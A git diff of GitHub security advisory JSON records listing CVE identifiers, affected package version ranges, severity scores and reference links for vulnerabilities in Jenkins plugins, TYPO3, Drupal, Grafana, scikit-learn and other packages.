"affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:openshift-deployer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003080" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-981" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:27:17Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-jr79-65xr-q7cx/GHSA-jr79-65xr-q7cx.json b/advisories/github-reviewed/2022/05/GHSA-jr79-65xr-q7cx/GHSA-jr79-65xr-q7cx.json new file mode 100644 index 0000000000000..283dbe658e176 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-jr79-65xr-q7cx/GHSA-jr79-65xr-q7cx.json @@ -0,0 +1,134 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jr79-65xr-q7cx", + "modified": "2024-02-07T23:10:06Z", + "published": "2022-05-17T00:26:03Z", + "aliases": [ + "CVE-2010-3659" + ], + "summary": "TYPO3 Cross-site Scripting vulnerability in the extension manager and backend forms", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in TYPO3 CMS 4.1.x before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4, and 4.4.x before 4.4.1 allow remote authenticated backend users to inject arbitrary web script or HTML via unspecified parameters to the extension manager, or unspecified parameters to unknown backend forms.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3659" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3659/" + }, + { + "type": "WEB", + "url": "https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-012/" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20120903133822/http://www.securityfocus.com/bid/42029" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2010/09/28/8" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2014/02/12/8" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T23:10:06Z", + "nvd_published_at": "2017-10-20T18:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-jrjx-8gmw-jj2q/GHSA-jrjx-8gmw-jj2q.json b/advisories/github-reviewed/2022/05/GHSA-jrjx-8gmw-jj2q/GHSA-jrjx-8gmw-jj2q.json index 3969f174f15b7..8015e57bd3bfa 100644 --- a/advisories/github-reviewed/2022/05/GHSA-jrjx-8gmw-jj2q/GHSA-jrjx-8gmw-jj2q.json +++ b/advisories/github-reviewed/2022/05/GHSA-jrjx-8gmw-jj2q/GHSA-jrjx-8gmw-jj2q.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8137" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8137.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-jwf8-mjj8-r8hq/GHSA-jwf8-mjj8-r8hq.json b/advisories/github-reviewed/2022/05/GHSA-jwf8-mjj8-r8hq/GHSA-jwf8-mjj8-r8hq.json index 1642e7178672f..018221400e521 100644 --- a/advisories/github-reviewed/2022/05/GHSA-jwf8-mjj8-r8hq/GHSA-jwf8-mjj8-r8hq.json +++ b/advisories/github-reviewed/2022/05/GHSA-jwf8-mjj8-r8hq/GHSA-jwf8-mjj8-r8hq.json @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "0.6" }, { "fixed": "0.6.2" @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/dompdf/dompdf/commit/cc06008f75262510ee135b8cbb14e333a309f651" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/dompdf/dompdf/CVE-2014-5011.yaml" + }, { "type": "WEB", "url": "https://github.com/dompdf/dompdf/compare/v0.6.1...v0.6.2" diff --git a/advisories/github-reviewed/2022/05/GHSA-jxfp-4rvq-9h9m/GHSA-jxfp-4rvq-9h9m.json b/advisories/github-reviewed/2022/05/GHSA-jxfp-4rvq-9h9m/GHSA-jxfp-4rvq-9h9m.json new file mode 100644 index 0000000000000..edcc9633aaf3b --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-jxfp-4rvq-9h9m/GHSA-jxfp-4rvq-9h9m.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jxfp-4rvq-9h9m", + "modified": "2024-02-01T20:59:15Z", + "published": "2022-05-24T17:34:40Z", + "aliases": [ + "CVE-2020-28975" + ], + "summary": "scikit-learn Denial of Service", + "details": "svm_predict_values in svm.cpp in Libsvm v324, as used in scikit-learn 0.23.2 and other products, allows attackers to cause a denial of service (segmentation fault) via a crafted model SVM (introduced via pickle, json, or any other model permanence standard) with a large value in the _n_support array.\nNOTE: the scikit-learn vendor's position is that the behavior can only occur if the library's API is violated by an application that changes a private attribute.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "scikit-learn" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.23.2" + }, + { + "fixed": "1.0.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28975" + }, + { + "type": "WEB", + "url": "https://github.com/scikit-learn/scikit-learn/issues/18891" + }, + { + "type": "WEB", + "url": "https://github.com/scikit-learn/scikit-learn/commit/1bf13d567d3cd74854aa8343fd25b61dd768bb85" + }, + { + "type": "WEB", + "url": "https://github.com/cjlin1/libsvm/blob/9a3a9708926dec87d382c43b203f2ca19c2d56a0/svm.cpp#L2501" + }, + { + "type": "PACKAGE", + "url": "https://github.com/scikit-learn/scikit-learn" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202301-03" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/160281/SciKit-Learn-0.23.2-Denial-Of-Service.html" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2020/Nov/44" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:59:15Z", + "nvd_published_at": "2020-11-21T21:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-m25m-5778-fm22/GHSA-m25m-5778-fm22.json b/advisories/github-reviewed/2022/05/GHSA-m25m-5778-fm22/GHSA-m25m-5778-fm22.json new file mode 100644 index 0000000000000..6700efef050a1 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-m25m-5778-fm22/GHSA-m25m-5778-fm22.json @@ -0,0 +1,90 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m25m-5778-fm22", + "modified": "2024-02-01T21:46:14Z", + "published": "2022-05-24T17:16:52Z", + "aliases": [ + "CVE-2020-12459" + ], + "summary": "Grafana world readable configuration files", + "details": "In certain Red Hat packages for Grafana 6.x through 6.3.6, the configuration files `/etc/grafana/grafana.ini` and `/etc/grafana/ldap.toml` (which contain a secret_key and a bind_password) are world readable.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0" + }, + { + "fixed": "7.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12459" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/issues/8283" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/102448040d5132460e3b0013e03ebedec0677e00" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2020-12459" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1827765" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1829724" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CTQCKJZZYXMCSHJFZZ3YXEO5NUBANGZS/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEBCIEVSYIDDCA7FTRS2IFUOYLIQU34A/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200518-0004/" + }, + { + "type": "WEB", + "url": "https://src.fedoraproject.org/rpms/grafana/c/fab93d67363eb0a9678d9faf160cc88237f26277" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200", + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:46:14Z", + "nvd_published_at": "2020-04-29T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-m2p5-fwp2-qcw2/GHSA-m2p5-fwp2-qcw2.json b/advisories/github-reviewed/2022/05/GHSA-m2p5-fwp2-qcw2/GHSA-m2p5-fwp2-qcw2.json index 035ac7f75eabb..5e4f96a9578c9 100644 --- a/advisories/github-reviewed/2022/05/GHSA-m2p5-fwp2-qcw2/GHSA-m2p5-fwp2-qcw2.json +++ b/advisories/github-reviewed/2022/05/GHSA-m2p5-fwp2-qcw2/GHSA-m2p5-fwp2-qcw2.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "yiisoft/yii2-elasticsearch" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0.5" + } + ] + } + ] } ], "references": [ @@ -40,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8074" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2-elasticsearch/CVE-2018-8074.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/yiisoft/yii2" }, + { + "type": "WEB", + "url": "https://www.yiiframework.com/news/168/releasing-yii-2-0-15-and-database-extensions-with-security-fixes/" + }, { "type": "WEB", "url": "http://www.yiiframework.com/news/168/releasing-yii-2-0-15-and-database-extensions-with-security-fixes/" diff --git a/advisories/github-reviewed/2022/05/GHSA-m46p-rp8x-x8c4/GHSA-m46p-rp8x-x8c4.json b/advisories/github-reviewed/2022/05/GHSA-m46p-rp8x-x8c4/GHSA-m46p-rp8x-x8c4.json new file mode 100644 index 0000000000000..fd2919447499e --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-m46p-rp8x-x8c4/GHSA-m46p-rp8x-x8c4.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m46p-rp8x-x8c4", + "modified": "2024-01-30T22:28:22Z", + "published": "2022-05-13T01:25:16Z", + "aliases": [ + "CVE-2019-1003081" + ], + "summary": "CSRF vulnerability in Jenkins OpenShift Deployer Plugin", + "details": "A missing permission check in Jenkins OpenShift Deployer Plugin in the DeployApplication.DeployApplicationDescriptor#doCheckLogin form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:openshift-deployer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003081" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-981" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:28:13Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-m648-hpf8-qcjw/GHSA-m648-hpf8-qcjw.json b/advisories/github-reviewed/2022/05/GHSA-m648-hpf8-qcjw/GHSA-m648-hpf8-qcjw.json index 76427fea205e6..7a35670ef9a6d 100644 --- a/advisories/github-reviewed/2022/05/GHSA-m648-hpf8-qcjw/GHSA-m648-hpf8-qcjw.json +++ b/advisories/github-reviewed/2022/05/GHSA-m648-hpf8-qcjw/GHSA-m648-hpf8-qcjw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m648-hpf8-qcjw", - "modified": "2023-12-20T21:03:22Z", + "modified": "2024-02-06T13:09:44Z", "published": "2022-05-24T19:05:06Z", "aliases": [ "CVE-2020-13663" @@ -9,7 +9,10 @@ "summary": "Drupal Core Cross-Site Request Forgery (CSRF) vulnerability", "details": "Cross Site Request Forgery vulnerability in Drupal Core Form API does not properly handle certain form input from cross-site requests, which can lead to other vulnerabilities.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -22,7 +25,45 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "7.0" + "introduced": "8.9.0" + }, + { + "fixed": "8.9.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.0.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" }, { "fixed": "7.72" @@ -41,7 +82,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "8.8.0" + "introduced": "8.0.0" }, { "fixed": "8.8.8" @@ -53,7 +94,45 @@ { "package": { "ecosystem": "Packagist", - "name": "drupal/core" + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.72" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.8.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" }, "ranges": [ { @@ -72,7 +151,7 @@ { "package": { "ecosystem": "Packagist", - "name": "drupal/core" + "name": "drupal/drupal" }, "ranges": [ { @@ -106,6 +185,14 @@ "type": "WEB", "url": "https://github.com/drupal/core/commit/faf3243c4ce03bbaab386af2b272b363fd0dfddb" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2020-13663.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2020-13663.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/drupal/core" @@ -119,7 +206,7 @@ "cwe_ids": [ "CWE-352" ], - "severity": "CRITICAL", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2023-12-20T21:03:22Z", "nvd_published_at": "2021-06-11T16:15:00Z" diff --git a/advisories/github-reviewed/2022/05/GHSA-m68x-cc2f-gr5h/GHSA-m68x-cc2f-gr5h.json b/advisories/github-reviewed/2022/05/GHSA-m68x-cc2f-gr5h/GHSA-m68x-cc2f-gr5h.json new file mode 100644 index 0000000000000..6f0976e564a35 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-m68x-cc2f-gr5h/GHSA-m68x-cc2f-gr5h.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m68x-cc2f-gr5h", + "modified": "2024-01-30T22:46:07Z", + "published": "2022-05-13T01:40:54Z", + "aliases": [ + "CVE-2017-1000095" + ], + "summary": "Unsafe methods in the default list of approved signatures in Jenkins Script Security Plugin", + "details": "The default whitelist included the following unsafe entries: DefaultGroovyMethods.putAt(Object, String, Object); DefaultGroovyMethods.getAt(Object, String). These allowed circumventing many of the access restrictions implemented in the script sandbox by using e.g. currentBuild['rawBuild'] rather than currentBuild.rawBuild. Additionally, the following entries allowed accessing private data that would not be accessible otherwise due to script security: groovy.json.JsonOutput.toJson(Closure); groovy.json.JsonOutput.toJson(Object).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:script-security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.29.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.29" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000095" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-07-10/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:46:07Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-m7rg-85g8-28m9/GHSA-m7rg-85g8-28m9.json b/advisories/github-reviewed/2022/05/GHSA-m7rg-85g8-28m9/GHSA-m7rg-85g8-28m9.json new file mode 100644 index 0000000000000..ba7cf4c804af6 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-m7rg-85g8-28m9/GHSA-m7rg-85g8-28m9.json @@ -0,0 +1,143 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m7rg-85g8-28m9", + "modified": "2024-02-08T21:57:47Z", + "published": "2022-05-02T03:47:10Z", + "aliases": [ + "CVE-2009-3633" + ], + "summary": "TYPO3 API function vulnerable to Cross-site Scripting", + "details": "Cross-site scripting (XSS) vulnerability in the `t3lib_div::quoteJSvalue` API function in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the sanitizing algorithm.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "4.0.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3alpha1" + }, + { + "fixed": "4.3beta2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3633" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/51f3dd9804cae04575323b92a9136e5a511fe810" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/5d4218fad3aeda46236754004232d7e635205e7a" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/ef9ab2da76c2506306d835209d2a38195bdf7bcf" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53925" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/core" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101223093042/http://www.securityfocus.com/bid/36801" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125633199111438&w=2" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:57:47Z", + "nvd_published_at": "2009-11-02T15:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-m8x6-6r63-qvj2/GHSA-m8x6-6r63-qvj2.json b/advisories/github-reviewed/2022/05/GHSA-m8x6-6r63-qvj2/GHSA-m8x6-6r63-qvj2.json index 8fb0eeccde0e8..a2962b82040e6 100644 --- a/advisories/github-reviewed/2022/05/GHSA-m8x6-6r63-qvj2/GHSA-m8x6-6r63-qvj2.json +++ b/advisories/github-reviewed/2022/05/GHSA-m8x6-6r63-qvj2/GHSA-m8x6-6r63-qvj2.json @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.13.0" + }, + { + "fixed": "4.13.3" + } + ] + } + ] } ], "references": [ @@ -52,6 +71,14 @@ "type": "WEB", "url": "https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2022-24899.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2022-24899.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/contao/contao" diff --git a/advisories/github-reviewed/2022/05/GHSA-mg66-3x8x-r8g2/GHSA-mg66-3x8x-r8g2.json b/advisories/github-reviewed/2022/05/GHSA-mg66-3x8x-r8g2/GHSA-mg66-3x8x-r8g2.json new file mode 100644 index 0000000000000..e293353de8058 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mg66-3x8x-r8g2/GHSA-mg66-3x8x-r8g2.json @@ -0,0 +1,127 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mg66-3x8x-r8g2", + "modified": "2024-02-08T21:41:03Z", + "published": "2022-05-02T03:46:56Z", + "aliases": [ + "CVE-2009-3630" + ], + "summary": "TYPO3 Backend vulnerable to Frame Hijacking", + "details": "The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote authenticated users to place arbitrary web sites in TYPO3 backend framesets via crafted parameters, related to a \"frame hijacking\" issue.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "4.0.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3alpha1" + }, + { + "fixed": "4.3beta2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3630" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53920" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101223093042/http://www.securityfocus.com/bid/36801" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:41:03Z", + "nvd_published_at": "2009-11-02T15:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-mg72-h5gj-8gg7/GHSA-mg72-h5gj-8gg7.json b/advisories/github-reviewed/2022/05/GHSA-mg72-h5gj-8gg7/GHSA-mg72-h5gj-8gg7.json new file mode 100644 index 0000000000000..1d4e61cbee22f --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mg72-h5gj-8gg7/GHSA-mg72-h5gj-8gg7.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mg72-h5gj-8gg7", + "modified": "2024-01-30T21:24:16Z", + "published": "2022-05-24T16:52:45Z", + "aliases": [ + "CVE-2019-10377" + ], + "summary": "Missing permission check in Jenkins Avatar Plugin", + "details": "A missing permission check in Jenkins Avatar Plugin 1.2 and earlier allows attackers with Overall/Read access to change the avatar of any user of Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "net.hurstfrost.jenkins:avatar" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 1.2" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10377" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1099" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:24:16Z", + "nvd_published_at": "2019-08-07T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-mhwq-4mh7-fv7c/GHSA-mhwq-4mh7-fv7c.json b/advisories/github-reviewed/2022/05/GHSA-mhwq-4mh7-fv7c/GHSA-mhwq-4mh7-fv7c.json new file mode 100644 index 0000000000000..565227329bcec --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-mhwq-4mh7-fv7c/GHSA-mhwq-4mh7-fv7c.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mhwq-4mh7-fv7c", + "modified": "2024-01-30T22:45:53Z", + "published": "2022-05-13T01:40:55Z", + "aliases": [ + "CVE-2017-1000096" + ], + "summary": "Arbitrary code execution due to incomplete sandbox protection in Jenkins 